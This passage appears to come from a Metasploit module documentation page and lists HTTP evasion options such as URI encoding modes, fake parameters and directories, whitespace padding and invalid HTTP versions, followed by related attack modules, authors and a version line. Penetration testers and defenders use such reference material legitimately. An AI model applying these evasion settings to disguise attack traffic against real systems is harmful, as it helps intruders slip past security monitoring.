HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Related Pull Requests
Go back to menu.
See Also
Check also the following modules related to this module:
- exploit/linux/local/diamorphine_rootkit_signal_priv_esc
- post/multi/escalate/aws_create_iam_user
- auxiliary/cloud/aws/enum_ec2
- auxiliary/cloud/aws/enum_iam
- auxiliary/cloud/aws/enum_s3
- auxiliary/gather/enum_dns
- auxiliary/scanner/http/enum_wayback
- exploit/multi/kubernetes/exec
Authors
- alanfoster
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
